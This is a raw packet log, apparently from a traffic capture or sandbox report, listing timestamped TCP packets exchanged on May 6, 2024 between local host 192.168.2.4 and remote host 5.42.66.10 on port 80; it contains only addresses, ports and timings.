May 6, 2024 07:53:08.707096100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707098007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707118034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707130909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707139969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707151890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707170010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707243919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707283974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707284927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707307100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707318068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707325935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707344055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707346916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707355976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707359076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707391024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707426071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707437992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707458973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707468987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707470894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707483053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707499027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707523108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707550049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707562923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707575083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707592964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707596064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707617998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707636118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707664013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707679033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707690001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707700968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707709074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707711935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707731962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707752943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707760096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707771063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707781076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707802057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707806110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707814932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707823992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707843065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707845926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707855940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707885027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707886934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707906008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707926035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707945108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.707945108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707989931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.707998991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708009958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708043098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708049059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708060980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708077908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708090067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708106995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708117962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708122969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708138943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708142042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708173037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708179951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708188057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708199024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708209991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708223104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708233118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708236933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708252907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708273888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708277941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708298922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708311081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708319902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708322048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708343029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708364964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708372116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708384037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708394051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708415031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708416939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708436966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708456039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708457947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708467960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708488941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708503008 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708524942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708528996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708540916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708553076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708564043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708573103 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708584070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708594084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708609104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708616018 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708621979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708625078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708645105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708646059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708659887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708667040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708688974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708698988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708707094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708730936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708740950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708743095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708771944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708775043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708803892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708813906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708834887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708847046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708848953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708874941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708889008 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708915949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708928108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708939075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708950996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708962917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.708971024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708982944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.708985090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709014893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709016085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709028959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709041119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709058046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709080935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709081888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709104061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709116936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709120989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709140062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709141970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709153891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709177971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709189892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709203005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709214926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709233999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709245920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709255934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709271908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709284067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709295034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709311962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709316969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709322929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709356070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709378958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709391117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709403038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709414005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709423065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709425926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709438086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709443092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709449053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709465981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709471941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709489107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709497929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709510088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709510088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709532022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709542990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709569931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709580898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709593058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709604025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709625959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709647894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709666014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709678888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709690094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709702015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709711075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709713936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709731102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709743977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709753990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709758043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709784985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709798098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709806919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709810019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709820986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709832907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709841013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709846020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709856033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709861040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709882975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709886074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709897995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709903955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709911108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709928036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709945917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709954023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.709955931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.709997892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710124969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710136890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710148096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710160017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710169077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710171938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710182905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710189104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710195065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710206032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710211992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710220098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710230112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710236073 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710242033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710248947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710254908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710267067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710270882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710278988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710289001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710294962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710300922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710311890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710314035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710320950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710324049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710335970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710347891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710349083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710361958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710371971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710372925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710383892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710395098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710407972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710408926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710418940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710432053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710433960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710445881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710457087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710458040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710470915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710479975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710483074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710496902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710520983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710522890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710534096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710545063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710556984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710566044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710567951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710580111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710583925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710592031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710604906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710613966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710627079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710633039 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710637093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710649967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710659981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710660934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710671902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710674047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710685015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710695982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710699081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710709095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710721016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710721016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710740089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710762024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710763931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710774899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710788012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710798979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710808039 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710812092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710818052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710824966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710838079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.710843086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710856915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.710880041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.744195938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.744271994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.951764107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.951783895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.951797009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.951874018 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.951884985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.951901913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.951905966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.951915026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.951927900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.951931953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.951944113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.951952934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.951957941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.951971054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.951981068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.951987028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952001095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952001095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952014923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952029943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952059984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952279091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952338934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952374935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952389002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952400923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952414989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952425957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952429056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952441931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952445984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952455997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952470064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952471972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952486038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952512980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952516079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952553988 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952666044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952678919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952696085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952708960 CEST	80	49741	5.42.66.10	192.168.2.4
